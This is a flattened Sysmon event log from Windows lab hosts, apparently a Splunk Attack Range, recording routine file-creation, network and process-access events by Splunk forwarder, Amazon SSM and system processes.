11:00:10.936{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8D25E11CE5AA75DF775BA68BDC81B7FB,SHA256=FA09AB013CDBEC54A90761F1AB4AC886CB8E004A86827169FD8EA0B4CDE26A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:10.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38813B7E56B89CF42E6F4058B497B305,SHA256=78FF34D154483BBC485116C454CFA17B94B2B216BD0C04896CA61FD8684FE9B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:07.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53844-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:11.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7C13B73BC1AE12B393CD8CA4D2E697,SHA256=84CF519085DC9DC32EDD3B8539B8304AD0EF829B4DC2386C68C11EE625ADDFBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:09.622{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51451-false10.0.1.12-8000- 23542300x8000000000000000218306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:11.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1968F008AD8839E04EBB44A7A9946EEF,SHA256=AEFFF8F407F889CA8065243F918688DC9924FD379D5BBA633ACED7C2D753C604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:12.617{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=416235574EEEC85CAF53900191562242,SHA256=7E375FFA49F2D49B7C4418D950B7C65DAF8DA91BC7AB6C60429A36ECA3338A42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:12.217{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3E461504A6A079B9BBAB82F4110F3A2,SHA256=B2A375CFD1A59746E952DDBECD87F2221A4713FBEFBEF497941394F57736D150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:12.023{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-143MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:13.617{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE90987DBDED43CBE5A8AEB692019060,SHA256=A0B104737721C80521ADF13C496905A62CC6204FA5EF29D681ACB11C44CDDEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:13.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265D831A7A0CB77F368B9E1C0FD661C4,SHA256=8ED1F43780F92A02A284691A73A7E1868013A56EF68F97664484A3CB6711B3A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:13.029{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-144MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:14.514{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=410BF8CDAD75B81E0818912D33F2FF39,SHA256=074F33268AB774AE4E464B16ACBE5A4354C704132B162F1DD57FED36E23E9595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:14.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108A91BFE9EE98743EA94A6773929972,SHA256=B563576CF79D2AA852C4134F7AE2EC818F96AADBEEBC9DDB5CD59D2ACAFA7B8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:15.529{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36C3B7B004953EBD7DB436C4FF23DBD,SHA256=D9E6FF1918B46957AF77BF07A25215D8B8A12518F77A261262952FA500B516B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:15.656{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9990AE6EDB8698A76087A6B33078B4EB,SHA256=6616E78A8A0D3A42F009A51238D4C2AC4CF51343B3152047D6EAD08147AFD561,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:12.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53846-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:15.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6B12048EB1EAA170C77E5C9DAAD986FF,SHA256=161437F13D66DF499C082B55FCD70AAE9B6682EAC09CE832B17DE5E6FA6AA8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:16.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180435768F1F09F5812FDB79FE0F748B,SHA256=702E79BF965E99C89335CC0CC0B42622139B2F467A93B1DBF9ABE99FA9B81232,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:16.545{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F954B551A560F739E91AD91F7276C32,SHA256=E29FADCEE02D7B5700697DC5405CFB574A8D2DF5F2CF04FB2113780A8D252921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:17.686{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E392A3723E2BC5FD5D18138A751B2BA,SHA256=13CCCFA5BBA24AAD3C766500F7332967C10A3309DCB042030220C727EA11D6D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:15.572{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51452-false10.0.1.12-8000- 23542300x8000000000000000218315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:17.560{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1643DE618E7C5F32A7132E23D30DA5A,SHA256=60C209308003FE2DE32CAEEE51A596A20E0BACF2A3F50339FEDEC22DC2D5E63E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:18.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D00F0A23E2226668FCE69821C0C63D14,SHA256=62A0ABF083035DE7A732A886E79C2A32508AE939CAF31C6B50BC89FB269EA983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:18.576{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92BDA2518B59ADB0BC03E66AD16494ED,SHA256=E7F23DE6B545864AD3A9A6962FEF3B711C7E55A46A695693D288CF052EEA8ACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:19.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=216363DC45492C97BF37EE38437D1477,SHA256=4605D38B461BB0CF519537BE9737E3F9B450B8CA560E6A4D8A33489476602220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.738{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D432FD023B44D747D598F940D35FE83,SHA256=D92BA254E5570CD85B48C71DAA9968EA2084ABFDB945B3A67ED5A75164C8E2C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.361{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13C3-6216-7A06-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.341{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-13C3-6216-7A06-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.340{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.340{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-13C3-6216-7A06-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.339{C8EA50B7-13C3-6216-7A06-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.186{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.186{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:19.186{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A1C0E200447BE857DE5F418111AA35,SHA256=F8706E22B9B352BC62A6F8FD13E8BAB5AD0D0EDEFE0D4830604FDEC6605C9D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:20.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D8C1F7A3E349073757D6235FA7A835,SHA256=B3AC5E28BC9BFFCCC138533C874A9CBE7823AC525F382EB7E82B21825F1E255E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:20.623{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-13C4-6216-7C06-000000003802}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 